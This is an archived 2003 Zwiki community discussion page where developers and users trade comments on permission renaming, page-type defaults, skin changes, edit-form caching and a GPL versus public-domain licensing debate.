PS and I plan to remove the ZMI
Add ZWiki Web option, for symmetry with CMF.
new setup methods for catalog, tracker, default pages --SimonMichael, Sat, 13 Sep 2003 01:03:42 -0700 reply
PS I could remove the ZMI
Add ZWiki Web option now, for symmetry with CMF. But this requires that people run /setupPages before they see any getting started docs. Unless I add those to any page that they create, if it's the first on in the folder. Or we can keep Add ZWiki Web as a convenience. It could probably be changed to Add Wiki if we want. Also as a matter of interest, if I could change Add ZWiki Page to Add Wiki Page without causing ugprade hassles, would that be better ?
new setup methods for catalog, tracker, default pages --simon, Sat, 13 Sep 2003 01:48:31 -0700 reply
And in that case, the permissions would be renamed: to Add Wiki, Add Wiki Page (consistent with other zope objects); or Zwiki: Add wikis, Zwiki: Add wiki pages (consistent and grouped with with other zwiki permissions). (Or some variant, eg: Zwiki: Create wikis, Zwiki: Create pages).
If these changes are worth the trouble, it looks as if they can be done while leaving the meta_type as before (
ZWiki Page). Could it be confusing and un-zopish to have an object whose meta_type is spelled differently from it's permissions and add menu item ? Any precedent for this ?
Finally (I promise) if that is considered a bit ugly, we could go all the way and change the meta_type to
Wiki Page. At this point we run into upgrade hassles, as old wiki pages will stop working after an upgrade. Unless the product provides both classes, for backwards compatibility, which I suppose it would need to do for ever. And is it desirable to remove the product name from all these places ? I leave you to ponder.. good night.
strange automatic renaming --FlorianKonnertz, Sat, 13 Sep 2003 01:52:17 -0700 reply (groovesurfer) was renamed to groovesurfe - and NooWiki:WikiVerwendung was moved to NooWiki:WikiVerwendung|Moved -- what ist that, thats new to me!??
diff note -- Sun, 14 Sep 2003 18:37:06 -0700 reply
The new text-wrap code in Python 2.3 may help reduce horizontal scrolling annoyances in page diff views.
Also noticed this time zone tool which might simplify some time zone handling. (??)
Default page type -- Mon, 15 Sep 2003 07:29:09 -0700 reply
I'm very confused. I'm running the 0.22 release, and the page type on newly created pages still seems to be set to default the same as the parent. But I have the source open in an editor right now and can see that it should default as follows:
p.page_type = type or self.defaultPageType()
and then:
def defaultPageType(self) """This wiki's default page type.""" allowedtypes = self.allowedPageTypes() if allowedtypes: return allowedtypes[0] else: return self.DEFAULT_PAGE_TYPE
Now type on a new page link should be None, and my
allowed_page_types is set such that reST is the first one, and it does indeed show it as the first in the list, it just picks ST as the default if the parent is ST. It's almost like the older ZWiki code is still around. Anybody have a clue as to what is going on?
Colin
RecentChanges? anomaly --DeanGoodmanson, Mon, 15 Sep 2003 11:44:23 -0700 reply
The dates on RecentChanges? are off. A search on "RecentChanges?" in the tracker returns everything.
note to self, cc: GeneralDiscussion --DeanGoodmanson, Mon, 15 Sep 2003 12:05:10 -0700 reply
- Remind the Zwiki community for feedback and collaboration on the [Simple Mailing List]? page.
- Analyze in light of Jon Udell's Email's Special Power
SisterSites, MetaWiki -- Mon, 15 Sep 2003 18:33:47 -0700 reply
Am I reading the pages correctly to understand that
- at one point SisterSites was implemented using a list of matching node-names from MeatBall:MetaWiki
- that list of matching nodes was 650kb back in 2000?
- querying that local list was against the text file, rather than against a Python dictionary or ZCatalog?
Should that approach be revisited? What is the right ZoPe way to handle a big chunk of structured data like that? Can you stuff a dictionary into a single ZODB entry? Is every thread caching a copy of it? If it's going to be read-only, does that help?
SisterSites, MetaWiki -- Tue, 16 Sep 2003 06:34:14 -0700 reply
One approach: the batch process that grabs the list from MetaWiki could step through every page in the local wiki and update a
sisterSites property. (Yuck, have to beware deleted pages in sistersites.)
An issue: does one want to automatically include all those MetaWiki sites as SisterSites. Probably not, so you'd need a place (a SisterSitesList? page? or a folder property only the admin can get to? probably the former) to define the list to match against.
Another Acceptable URL character --DeanGoodmanson, Tue, 16 Sep 2003 11:05:56 -0700 reply
:-) Looks like curly braces need to be added also. My short search for a URL approving regex left me lost in a mess similar to looking up a javascript recipe.
(The following is a Jython database interaction article.) :{72F55276-094B-4F7E-A5B9-796A6C251F31}&element_id={770F9C3C-5472-4507-9779-51C2E84D8D38}&st={EA04B5C6-6D59-4670-AC88-4982C49B746D}&session_id={35CF3D7C-5845-4631-BE5F-A9B96EA0C071}
Brackets work for a short-term workaround
Sorry for replying to the wrong thread.
Another Acceptable URL character --DeanGoodmanson, Tue, 16 Sep 2003 11:09:59 -0700 reply
brackets worked in my 0.17 version. :-/
Plone integration --Kurt Yoder, Tue, 16 Sep 2003 13:40:44 -0700 reply.
Plone integration --Kurt Yoder, Tue, 16 Sep 2003 14:14:35 -0700 reply
Kurt Yoder said:.
And after posting this I'm seeing info in the FAQ already...
-- Kurt Yoder Sport & Health network administrator
Plone integration --Simon Michael, Tue, 16 Sep 2003 15:15:25 -0700 reply
Woohoo! The docs are working! :)
Sorry I didn't understand the previous post at all. Hopefully it will become clear as you check out the examples.
Default page type --Simon Michael, Tue, 16 Sep 2003 15:31:15 -0700 reply
Hey Colin.. create() chooses the page_type when no type is passed in.. but in fact the default editform template has already told it what type to use, and it inherits the parent's type just as create() used to. I guess we should change it there too ? Instead of:
tal:attributes="value python:type; selected python:type==here.page_type;"
use:
tal:attributes="value python:type; selected python:type==here.defaultPageType();"
? I can't see the other ramifications if any.
RecentChanges? anomaly --Simon Michael, Tue, 16 Sep 2003 15:37:40 -0700 reply
The dates on RecentChanges? are off.
Someone else said this but I don't see it. Could it be the server timezone change I announced recently ? Do you have a timezone configured in UserOptions? ?
A search on "RecentChanges?" in the tracker returns everything.
Yup, got it in the tracker. Thanks.
note to self, cc: GeneralDiscussion --Simon Michael, Tue, 16 Sep 2003 15:47:06 -0700 reply
DeanGoodmanson wrote:
a. Remind the Zwiki community for feedback and collaboration on the [Simple Mailing List]? page.> > b. Analyze in light of Jon Udell's "Email's Special
It's on my mental todo list.. I liked the idea but didn't see what to do with it just yet. Where should we link it/merge it/whatever. Maybe some questions: What target audience does it address, how does it relate to WikiMail, where might they both belong on the refactored ZWiki page ? Nice link.
SisterSites, MetaWiki --Simon Michael, Tue, 16 Sep 2003 15:52:23 -0700 reply
Your reading is correct I think. I'd like to get this working again, but I don't necessarily want all MetaWiki sites. I'd like to make it easy to keep a zwiki synced with (usually a small number of) explicitly declared sister wikis. I was thinking in terms of a nightly cron script updating a local text file and reading that via LocalFS.. but any experiments on your part would be helpful.
permission, type renaming --Simon Michael, Tue, 16 Sep 2003 16:11:19 -0700 reply
More on this - good news! I found out the "Add..." permission names are not hardcoded. Bad news! I'm contemplating a permissions rename for 0.23. But I think it's worth it. Details:
- in the zmi add menu, change
Add ZWiki Weband
Add ZWiki Pageto
Add Wiki,
Add Wiki Page
- in permissions, change
Add ZWiki Weband
Add ZWiki Pageto
Zwiki: Add wikis,
Zwiki: Add pages. Also, while we're renaming, change
Zwiki: Add comments to pagesto
Zwiki: Add comments.
- meta_type will remain
ZWiki Page
Not consistent with everything but it looks to me like the least surprising arrangement. Here's some other options I thought about, and the other permissions for context:
# before 0.23 #AddWiki = 'Add ZWiki Webs' #Add = 'Add ZWiki Pages' #Comment = 'Zwiki: Add comments to pages' # from 0.23 #AddWiki = 'Add Wikis' AddWiki = 'Zwiki: Add wikis' #AddWiki = 'Zwiki: Add wiki webs' #AddWiki = 'Zwiki: Create wikis' #AddWiki = 'Zwiki: Create wiki webs' #Add = 'Add Wiki Pages' Add = 'Zwiki: Add pages' #Add = 'Zwiki: Add wiki pages' #Add = 'Zwiki: Create pages' #Add = 'Zwiki: Create wiki pages' Comment = 'Zwiki: Add comments' ChangeType = 'Zwiki: Change page types' ChangeRegs = 'Zwiki: Change regulations' Delete = 'Zwiki: Delete pages' Edit = 'Zwiki: Edit pages' Rename = 'Zwiki: Rename pages' Reparent = 'Zwiki: Reparent pages'
permission, type renaming --Simon Michael, Tue, 16 Sep 2003 16:15:57 -0700 reply
PS in case it wasn't clear - I've already checked this in, but I'm looking for feedback on it, eg if you see any problems with this do speak up.
Power of email and wiki --DeanGoodmanson, Tue, 16 Sep 2003 16:56:55 -0700 reply
What target audience does it address?
I think the article covers the masses. I drew most of my criticism/tangents when considering it in a small community and/or intranet venue.
how does it relate to WikiMail?
The email cc: list seems to be forced membership nomination to a closed group, where wikimail is membership subscription in an open group. The cc: cost of entry is low, especially when compared to forums and mailing lists, but I don't consider much heavier than zwiki's
subscribe link. I wouldn't suggest adding "forced nomination" features to Zwiki (even in an intranet setting) as those are possible by forwarding the latest comment to those who might be interesting. The cc: feature of immediate audience perspective is one which may work in an intranet, but in general pulls people back into the email grapevine.
where might they both belong on the refactored ZWiki page ?
I'm lost here.
Power of email and wiki --Simon Michael, Tue, 16 Sep 2003 19:05:50 -0700 reply
Oh, I meant how does it relate to the existing WikiMail page on this wiki, and what do we need to do to present this stuff more clearly to visitors. Sorry, I am burned out on docs right now.
Note we have an auto_subscribe feature that sounds like "forced nomination".
Zwiki and GPL vs ZPL vs BSD vs Public Domain -- Tue, 16 Sep 2003 21:09:07 -0700 reply
To continue the Zwiki License discussion:
I believe it is correct to say that each author of every single contribution to Zwiki is entitled to copyright law protection automatically on their piece of code. Especially considering that (I expect) all the authors were operating under the GPL system, meaning they each invoked a copy-left based on their individual right to ownership of their code. Unless every single author specifically assigned their copyright to Simon, then he would not have the legal authority to change the license for Zwiki as a whole, but rather only the parts he personally created. This is one example of how using these trick copyleft licenses only causes more problems down the road. You don't need any license or any ownership rights at all. In fact, the less restrictive the license is the better to help the adoption and spread of the software. Make a case for what negative things would happen if Zwiki was released into the public domain, and I would be happy to address it in detail.
Simon, are you saying that you would not be willing to code software (for hire) in the public domain? How much would you charge to rewrite/release Zwiki in the public domain? Once it is there, as you recognized, there is no going back. If not led by you, others will do it. It will be called Zwiki, or it will be by another name. You have the power to decide (and convince your contributors as well) if you want enable Zwiki to truly flourish or if you would rather open the door for another wiki product with a more liberal license to take its place over the long run. I know that this is the inevitable outcome. Really free, unrestricted, public domain software that encourages all types of use and sharing of code will win out over similar GPL-restricted code.
I won't be able to convince everyone, but I want to make a strong effort here to avoid duplicating your efforts. If you decide to go ZPL to get in line with FreeBSD?, Python and Zope, why stop there? Set the example by going public domain and watch Zwiki development take off.
If any of you find yourselves with strong opinions about this issue, please get in touch, I would really appreciate your feedback.
Nate n_johnson@yahoo.com
Rendering pages like IssueNoXXXX? --Hans Beck, Tue, 16 Sep 2003 22:48:16 -0700 reply
Hi,
I'm using Zwiki 0.22.0 with Zop 2.6, and my Installation doesn't render pages like IssueNoXXXX?. But these pages could be created and a visitable and changeable in ZMI. Is this a known problem ? I've looked in FAQ, docs and on zwiki.org and found nothing.
Thanks and greetings
Hans
Rendering pages like IssueNoXXXX? --Simon Michael, Wed, 17 Sep 2003 08:19:54 -0700 reply
What happens ?
What if you add some issue description after the XXXX ?
Mirroring a Zwiki
Is there a good way to mirror a zwiki?
thanks scott
FAQ --DeanGoodmanson, Wed, 17 Sep 2003 10:39:39 -0700 reply
The anchor references to questions ending in
? (eg.
How ?) do not work on IE (5 and 6) for Windows. (Fine on Mozilla, Mac.)
granular page-trail-based permissions? -- Wed, 17 Sep 2003 11:28:16 -0700 reply
One thing I thought that was cool in the old zope.org wikis was the ability to set permissions for a single page and various pages related to it (child pages, or maybe anything following it, etc.). I think this could be handy for quickie creation of tiny short-lived private groups hidden away within more open spaces. Like embedding QuickTopic? into a Wiki. (I'm reminded/inspired by JonUdell?'s EmailsSpecialPowers? piece.)
granular page-trail-based permissions? --DeanGoodmanson, Wed, 17 Sep 2003 11:39:03 -0700 reply
Funny you should mention this... the RegulatingYourPages page and feature have recently put on the "is this feature worth the maintenance?" mode.
clear recycle_bin --DeanGoodmanson, Wed, 17 Sep 2003 15:52:41 -0700 reply
Saw the note on the FrontPage about catalog optimizations. I think the contents of recycle_bin are in your catalog (unless you've found a way to keep sub-folders from being indexed :-? ) and chucking them might eak out a tiny bit more resources.
... -- Wed, 17 Sep 2003 16:07:59 -0700 reply
SECURITY?
Someone please answer this!..
quick update --SimonMichael, Wed, 17 Sep 2003 16:26:57 -0700 reply
Delete is fixed and the catalog optimization for hierarchy generation is in effect again (it was looking for title_or_id which has been removed from the catalog). Sorry for the downtime this morning. Also I'm experimenting with an automatic discussion section separator, so you may see some double rules/"discussion" headings here and there.
clear recycle_bin --Simon Michael, Wed, 17 Sep 2003 16:37:42 -0700 reply
They should not be indexed.. ZwikiAndZCatalog has the trick
AllPages -- Wed, 17 Sep 2003 19:58:06 -0700 reply
Had to get rid of CMFPlone AllPages temporarily because output is badly rendered as of my latest upgrade. I did Plone 1.0.5 along with 0.22, without looking things over in between, which is probably not the best idea. Prime suspect would probably be some CSS handling. Has anyone experienced this kind of problem lately?
Rendering pages like IssueNoXXXX? --Hans Beck, Wed, 17 Sep 2003 22:56:34 -0700 reply
Hi, That are the error messages: -------------------------------------------------- Site Error An error was encountered while publishing this resource.
Bad Request
Sorry, a site error occurred.
Traceback (innermost last):
Module ZPublisher.Publish, line 150, in publish_module Module ZPublisher.Publish, line 114, in publish Module Zope.App.startup, line 199, in zpublisher_exception_hook Module ZPublisher.Publish, line 98, in publish Module ZPublisher.mapply, line 88, in mapply Module ZPublisher.Publish, line 39, in call_object Module Products.ZWiki.ZWikiPage, line 273, in __call__ Module Products.ZWiki.ZWikiPage, line 2481, in upgrade Module Products.ZWiki, line 152, in manage_addProperty Module OFS.PropertyManager, line 248, in manage_addProperty Module OFS.PropertyManager, line 175, in _setProperty Bad Request -----------------------------------------------------
it doesn't matter if the name is "IssueNo0004? anything" or "IssueNo0004?", it is the same if creating the page at ZMI or by using the zwiki mechanism
BTW, I'm using Win2k
- Hans
Subtopics --DeanGoodmanson, Thu, 18 Sep 2003 07:33:07 -0700 reply
Is this a magic property?
Subtopics --Simon Michael, Thu, 18 Sep 2003 09:55:18 -0700 reply
Not yet.. I hacked it into the render methods and let upgradeAll grind it's way through all pages.
It's always on right now. Too obtrusive ? or maybe we will adjust. It makes the hierarchy more important and could make it easier to develop docs in the way of drupal books (cf ZWiki). Ideas welcome.
Re: IssueTracker page broken --Simon Michael, Thu, 18 Sep 2003 10:41:21 -0700 reply
Thank you, fixed.
Subtopics --Simon Michael, Thu, 18 Sep 2003 10:43:28 -0700 reply
I had to take it out.. it broke some dtml pages and was wrong - children need to be calculated dynamically at view time, not at edit time. This is not yet a totally cheap operation so disabled for the moment.
Rendering pages like IssueNoXXXX? --Simon Michael, Thu, 18 Sep 2003 12:06:39 -0700 reply
I thought this worked but apparently not. It's expecting the issue_categories/issue_severities/issue_statuses folder properties to be there. You can add these manually or try CVS where I've added a fix. Thanks.
FAQ --Simon Michael, Thu, 18 Sep 2003 12:09:46 -0700 reply
Dean - do the faq links not work at all in IE ? Or just the ones with space before the ? ?
Really those urls should be quoted but it's inconvenient.
FAQ -- Thu, 18 Sep 2003 12:14:49 -0700 reply
Just the ones with the space preceding the question mark. I didn't think about quoting. :-/
Zwiki and GPL vs ZPL vs BSD vs Public Domain --Simon Michael, Thu, 18 Sep 2003 13:29:53 -0700 reply
Hi Nate - thanks for this and your letter. As is so often the case in these discussions we have similar goals and different ideas about the most effective strategies.
> Unless every single author specifically assigned their copyright to > Simon, then he would not have the legal authority to change the > license for Zwiki as a whole
That's why since very early on the copyright has read:
(c) 1999,2000,2001,2002,2003 Simon Michael <simon@joyful.com> for the zwiki community.
Not that I've asked anyone for papers.
Public domain has well-documented problems, though I can't put my finger on a doc right now. If I remember correctly one was that someone can take your PD code, copyright it and sue you for infringement. Something of that kind. A license (any license) gives the developer more protection against such things. GPL gives the developer most protection, at least in practice and to date, and so it is the conservative safe choice.
Whether I would offer parts of zwiki under an alternate PD license, or develop new code and release it as PD, for hire, is an interesting question. Like most GPL developers I'm open to providing GPL exceptions for commercial use for a fee. Releasing as PD is more than an exception though. It's "will you give up the GPL for this lesser non-license with it's known problems ?" Well.. all I can say is that if the offer was high enough, I'd have to go and re-read those PD problem docs. :)
couple of ?s --dan mcmullen, Thu, 18 Sep 2003 14:35:41 -0700 reply
- i'm trying to enable the regulations logic. added true
use_regulationsboolean to my top level ZWiki folder, but no effect seen in the edit page.
- also trying to get external editor running. seems to be working up to the point when the helper app opens the downloaded file. then get
FATAL ERROR: unknown encoding: mbcs. same deal if i download the file & open it via cmd line.
running ZWiki 0.22/Zope 2.6.2/Mozilla/W2K
tia! dan
couple of ?s --SimonMichael, Thu, 18 Sep 2003 15:19:49 -0700 reply
The regulations form was removed from zwiki's plone edit form.. and what do you know, it's not in the default one either. So the bit-rot has already set in. I see back in march I wrote:
revision 1.1 date: 2003/03/29 04:45:19; author: simon; state: Exp; and lastly, a page template version of editform. I have not bothered with regulations until I hear from users.
And here you are (hi. :) You could get the old editform.dtml from the 0.18 release and drop it into a
editform DTMLMethod in your wiki. It might work. If you go to that trouble, keep us posted.
No idea about the EE problem, sorry.
Daydreaming: "Find related pages/articles/comments" --PieterB, Fri, 19 Sep 2003 10:18:02 -0700 reply
Hi there... I've been thinking of a nice new feature: "find similar pages", which would work on more than one (z)wiki's or blog. The plan is to index/spider several sites (such as zwiki.org) extract all the text on it (and handle comments as seperate text), and feed the plain text to a Bayesian filter as a trainingdocument for the URL (and all the Zwiki page parents). This can be used to create a zwiki-classifier. The classifier can then be used to calculate the "distance" between any of the pages/articles/comments, and calculate the Top-N documents which are similar to the specific document.
I can even use the zwiki-mail, to minimize the load on zwiki.org.
I found the following classifiers (C++/C/Java/Python) using which might be relevant: classifier
Reverend: Reverned is a general purpose Bayesian classifier written in Python. It is designed to be easily extended to any application domain.
Divmod: Divmod Quotient is a personal conversation server. It is built on the Twisted framework, Lupy search engine and The Reverend bayesian classifier. Bayesian Network Tools in Java (BNJ): Java/XML toolkit for research using Bayesian networks and other graphical models of probability (exact and approximate inference, structure learning, etc.
Bayes++: Bayes++ is a library of C++ classes that implement numerical algorithms for Bayesian Filtering. They provide tested and consistent numerical methods and the class hierarchy represents the wide variety of Bayesien filtering algorithms and system models.
dbacl - digramic Bayesian classifier: dbacl is a general purpose digramic Bayesian text classifier. It can learn text documents you provide, and then compare new input with the learned categories. It can be used for spam filtering, or within your own shell scripts.
Bayesian Network Classifiers in Java: jBNC is a Java toolkit for training, testing, and applying Bayesian Network Classifiers. Implemented classifiers have been shown to perform well in a variety of artificial intelligence, machine learning, and data mining applications.
Pyndex: Pyndex is a simple and fast full-text indexer and Bayesian classifier implemented in Python. It uses Metakit as its storage back-end. It works well for quickly adding search to an application, and is also well suited to in-memory indexing and search.
Bayesian Filter Library: A general purpose C++ library. Essentially Bayesian Filtering is a way of having a program learn to categorize information from a specific user through pattern recognition. (C++)
libbayes: libbayes is a library for solving Bayesian decision theoretic problems in C.
Bichoco: Bichoco is a bayesian networks framework composed of a library written in Standard C++ and a GUI software. The library is ISO-C++ compliant. The GUI is ISO-C++ compliant and GNOME compliant (it is based on gnomemm library).
Anybody got some expertise with "automatic text classification" using open source tools? Anybody want to help thinking about this comment or want to contribute to it in some other form?
Subtopics --SimonMichael, Fri, 19 Sep 2003 10:53:08 -0700 reply
Automatic subtopics have been re-enabled. They'll appear when you next edit or /clearCache a page. Sometimes these are useful, sometimes not; I'd like to avoid confusing options but I'm not sure it's possible to live with these always on. (See eg IssueTracker.)
Subtopics --DeanGoodmanson, Fri, 19 Sep 2003 13:22:18 -0700 reply
Thoughts on whether this would be kept outside the document? My surprise was that I couldn't find it in the edited text. (I think I communicated this similarly and poorly on BillSeitz page.)
I think I'd like it below the footer, but I can understand it between the doc and comment portion. There are also interesting implications to the /print method. One current bug in the print method is that you have to specify a value for the attributes for them to be
not None. Do you know another way around this?
How can I mirror? -- Fri, 19 Sep 2003 13:26:23 -0700 reply
Can you explain what you want the mirror for? Reference or ... or backup?? (Print all w/ children.)
There's also the [curl]? or wget approach.
sorry --simon, Fri, 19 Sep 2003 13:29:32 -0700 reply
I just bounced someone's mailin by restarting the server.
I had a thought....why does ZWiki not have a comment mode? I mean leading line comments like:
# This is a comment...Is anybody opposed to such a thing? Mixing HTML and stx is somewhat distateful, it would be nice if stx had its own comment mechanism.
Of course I should fix LatexWiki to respect HTML comments...
Zwiki and GPL vs ZPL vs BSD vs Public Domain -- Fri, 19 Sep 2003 22:28:02 -0700 reply
Simon, I am searching for those Public-Domain-problem docs myself, and I keep turning up the same arguments: -you lose control- -you can't prevent someone else for taking credit for your work -you can't force someone to keep the source code open -you can't force someone not to charge money or add restrictions to the derivative work
"someone can take your PD code, copyright it and sue you for infringement." One cannot choose to "copyright" something, which I why I still believe that you are legally incorrect to say that you have control over the copyright to contributed code without an overt act by each contributor (just like some projects assign their copyright to the FSF). Copyright protection happens automatically under the law for the author. Certainly there is plenty of evidence, forensic and by means of personal testimony, about who is wrote the software and exactly when, not the least of which would be the cvs repository. No one can claim a copyright for the portions of their work that can easily be shown to have already been released into the public domain. "conservative safe choice." This doesn't seem the typical mantra of one so close to changing the world!
Not just with respect to software, but for everything, I am convinced that unrestricted (non-forced) sharing (no fear!) is the far superior means of making change.
FreeBSD? is attracting development BECAUSE of its liberal license. The more liberal, the more you will get! from: ". By pooling our expertise with the open source development community, we expect to improve the quality, performance, and feature set of our software. In addition, we realize that many developers enjoy working with open source software, and we want to give them the opportunity to use that kind of environment while they're creating solutions for Apple customers.
Although many people think that the rather simple BSD license does little to protect the openness of the code, it has contributed significantly to Apple's ability to adapt the code for the benefit of Mac users. Its emphasis on sharing code has also heightened our own commitment to the open development process. "
Please, let's keep this discussion going. Thanks!!!
Nate
ps now there is more about my general philosophy which tells me all this is true without a doubt on also see what would happen to computing if we redesigned everything to enable unrestricted sharing:
AttributeError? --gif, Sun, 21 Sep 2003 16:37:38 -0700 reply
Just upgraded to Zwiki 0.22.0 on Zope 2.6.2b5 and now I get this when accessing an old ZWiki: Traceback (innermost last):
------------------------------- Module ZPublisher.Publish, line 150, in publish_module Module Products.Localizer, line 58, in new_publish Module ZPublisher.Publish, line 114, in publish Module Zope.App.startup, line 199, in zpublisher_exception_hook Module ZPublisher.Publish, line 89, in publish Module ZPublisher.BaseRequest, line 418, in traverse Module ZPublisher.BaseRequest, line 494, in old_validation AttributeError -------------------------
Newly added Wikis work fine. Any help appreciated!
Daydreaming: "Find related pages/articles/comments" --jos yule, Mon, 22 Sep 2003 06:38:47 -0700 reply
You might want to look at Zoe for some inspiration, i've been using it and its pretty interesting/cool
it folds into the whole interwingle-ly thinking. See this article:
j
Subtopics --DeanGoodmanson, Mon, 22 Sep 2003 11:56:51 -0700 reply
After further review, I like these but stand by my wish that they are seperated from page content & discussion. Thus, would putting it in a bordered table suffice? (At times I've felt that every transcluded page be similarly indicated/annotated..)
btw, I like the new footer layout.
Subtopics --Simon Michael, Tue, 23 Sep 2003 00:31:17 -0700 reply
It definitely needs something. As you probably saw, I liked the way drupal keeps these links with the document, with the comments coming afterwards and being clearly an "extra" that you're not required to read. The nav links on zwiki.org are too hard to see right now though, in part due to the mish-mash of old- and new-style comments we have on this site.
I'll try enclosing them in a shaded table. I'm not sure I can leave them on though, since they slow down page rendering. I have gone part way to allowing them to be enabled only for certain pages (see widget in the editform) - the idea is you could turn on this feature on eg the top FAQ or Zwiki Book page, where it's most useful; all offspring would inherit the setting too. I'm not 100% happy with this either. I do think it's a nice feature that a wiki can be equivalent to a GNU info manual, though.
skin changes --Simon Michael, Tue, 23 Sep 2003 00:56:30 -0700 reply
btw, I like the new footer layout.
thanks.. you noticed these skin tweaks eh.
For some time I've been tempted to get rid of the gray background at the top in favour of a more plain header like some other popular wiki engines. I think the minimal header says "see! I'm light and efficient like other wikis!", "no need to be scared of zope baggage!" and "ready to customize!". So I've removed gray from the top - and added some at the bottom.
I must have tried just about every layout permutation of those footer elements by now. Subject is now above message body - less compact but much more intuitive to most people.
The help link has moved to the center, leaving only page actions at bottom right. The center links are a bunch of standard wiki actions with "friendly" non-wiki names borrowed from CommonPlace. These replace the user bookmark links - with so many wikis around I think we rarely have time to set bookmarks so I'm thinking that option should be dropped in favour of these standard links. That center area is where we could probably fit the navigation links too.
I originally wanted number of subscribers at the top as a valuable indicator of a page's value - like a rating - but I think it's not such a bad idea to have it down by the comment button either, as a reminder to someone considering making a comment.
Any other feedback ? There's always a bit more clutter than I want, but I think it's functional and shouldn't scare people too badly. If these changes seem agreeable I guess they'll become the default in 0.23.
AttributeError? --Simon Michael, Tue, 23 Sep 2003 01:00:50 -0700 reply
Sorry, I'm stumped by that.
Zwiki and GPL vs ZPL vs BSD vs Public Domain --Simon Michael, Tue, 23 Sep 2003 01:16:23 -0700 reply
Nate - sorry I don't have time to respond at length just now. You make a good point about falling back into fear thinking, but on the other hand it makes no sense for a free software developer to take on risk that can easily be avoided.
Have you read the writings at gnu.org by the way ?
Subtopics --SimonMichael, Tue, 23 Sep 2003 02:23:07 -0700 reply
Test: showing navigation links only in full mode. This makes some kind of sense, but means you can't rely on these links for documentation.
more skin changes --SimonMichael, Tue, 23 Sep 2003 13:04:05 -0700 reply
fit the page management panel on one row; try it and the link panel at the top; move site links left and level-of-detail links right; show comment form even in minimal mode.
more skin changes --DeanGoodmanson, Tue, 23 Sep 2003 15:43:09 -0700 reply
The
delete button is where I currently reach for "edit" and "save". !:-} I like edit at the top, but would also like it at the footer, as the next step after reading a page.
Plans for Bookmarks and AnnoyingQuote?
catalog rebuilding help needed --DeanGoodmanson, Tue, 23 Sep 2003 15:47:16 -0700 reply
Would you point me to your code (or catalog rebuilding steps) to keep the catalog from searching the recycle_bin? I need to do so for all sub-folders.
I'm currently battling with backlinks and the catalog code that leverages canonicalLinks seems to be most appropriate, except for those dang subfolder entries!
catalog rebuilding help needed --SimonMichael, Tue, 23 Sep 2003 16:03:19 -0700 reply
Using zope 2.6 or greater, try this in the expr field on the catalog find form:
self.folder().id == 'mywikifolderid'
more skin changes --SimonMichael, Tue, 23 Sep 2003 16:06:44 -0700 reply
Yes that was a problem. It's now at the bottom. Navigation links now appear at the top in full mode, and I've rearranged all the quick access keys, see QuickReference.
more skin changes --SimonMichael, Tue, 23 Sep 2003 16:12:01 -0700 reply
would also like it at the footer, as the next step after reading a page.
It was busy-looking, but I may put it back.. you could also just hit alt-N/P/U.
Plans for Bookmarks and AnnoyingQuote?
Drop em! Front page only!
editform.pt --Steve Knight, Wed, 24 Sep 2003 03:58:21 -0700 reply
Just a question really but my ZWiki users were complaining that when editing forms they had to hit refresh to override their browser caching and get the most recent version.
After trawling through the discussion it appears someone suggested adding <META HTTP-EQUIV name="expire" ...> to the editform.pt. I've done this and now everyone's happy.
Is there any reason why this can't be in the default? Or did I miss something?
editform.pt -- Wed, 24 Sep 2003 07:03:34 -0700 reply
adding <META HTTP-EQUIV name="expire" ...>
The only reason I know of that this isn't the default is the issue where there's a collision (user B updates while A is editing, then A gets the error screen and needs to go back.) The other functionality you may lose is the ability to go "back" and tweek instead of clicking edit again.
Please keep us posted. The browser caching issue is frustrating. Is it any browser or a certain one?
removing HTTP_REFERRER -- Wed, 24 Sep 2003 08:15:21 -0700 reply
Anybody successfully masked the HTTP_REFERRER from your Zope or Zwiki instance?
My attempts to overwrite the variable simply created another! I was hopeing a modification the the page code would work, rather than having to modify zope code, as in looking there it seems that the ZMI may leverage it in some places.
editform.pt --Steve Knight, Wed, 24 Sep 2003 08:27:48 -0700 reply
Please keep us posted. The browser caching issue is frustrating. Is it any browser or a certain one?
Opera7.11 & IE6.0
editform.pt --Simon Michael, Wed, 24 Sep 2003 09:11:42 -0700 reply
Thanks for the reminder.. did you see this at #390 Going into edit mode shows old content of page or somewhere else ?
Can someone can tell me exactly what the appropriate header is for the edit form ? I'll add it for 0.23.
I'd welcome any http header suggestions for the other zwiki views too. I once tried setting the last-modified header to last edit time to make them more browser-cacheable, but didn't get it working. Perhaps it would be appropriate for at least minimal mode, which has few dynamic elements.
editform.pt --Simon Michael, Wed, 24 Sep 2003 09:21:48 -0700 reply
The only reason I know of that this isn't the default is the issue where there's a collision (user B updates while A is editing, then A gets the error screen and needs to go back.) The other functionality
How will the expires header affect this ?
you may lose is the ability to go "back" and tweek instead of clicking edit again.
Yes, that would be bad.
Shouldn't some kind of last-modified header be appropriate here also ? If we tell the browser when thing last changed, we might expect it to figure out what to do.
AngryDenial -- Wed, 24 Sep 2003 09:31:23 -0700 reply
Should this page go? Noticed it via FrontPage.
More importantly, can we setup a page for this type of question outside of GeneralDiscussion?
AngryDenial --SimonMichael, Wed, 24 Sep 2003 09:49:06 -0700 reply
Nooo! AngryDenial!
I like this page and you see, it's useful :)
There's WikiCleanup, if you don't want to post such things here. It's not a discussion page though, I would think here is best unless the amount of cleanup activity gets unprecedentedly huge.
editform.pt --Steve Knight, Wed, 24 Sep 2003 09:58:59 -0700 reply
you may lose is the ability to go "back" and tweek instead of clicking edit again.
Yes, that would be bad.
Ahh maybe that's why it was never done before. Speaking personally I think I'd ALWAYS want the editform to show me the current page in the ZODB. But I guess I'm probably just a bit weird!
I'm not sure how you're going to tell the difference between a
back and a fresh edit. Is there a way?
AngryDenial -- Wed, 24 Sep 2003 10:23:39 -0700 reply
:-)
I've added " More like this: "
editform.pt --dan mcmullen, Wed, 24 Sep 2003 12:21:46 -0700 reply
SimonMichael wrote:
I once tried setting the last-modified header to last edit time to make them more browser-cacheable, but didn't get it working.
setting last-modified seems like a good idea to me. it would make it easier to track changes in ZWiki pages generally. what were the problems? (i might be able to work on this.)
re: couple of ?s -- Wed, 24 Sep 2003 12:57:02 -0700 reply
an update:
SimonMichael wrote:
>The regulations form was removed from zwiki's plone edit form. [...]? You could get the old editform.dtml from the 0.18 release and drop it into a editform DTMLMethod in your wiki. It might work. If you go to that trouble, keep us posted.<<<
this displays the regulations edit form at the bottom of the edit page, but
edit by owner and
create subpage by owner don't seem to have any effect - anonymous users can still edit/create. possibly i'm not understanding ownership. is this the authenticated zope owner? the user saved in the cookies?
in any case, i'm wondering: can (most of) the functionality of regulations be achieved using SubWikis? and the usual Zope permissions mechanism? anything lost using that scheme? what is the state of the art in SubWikis??
regarding the External Editor
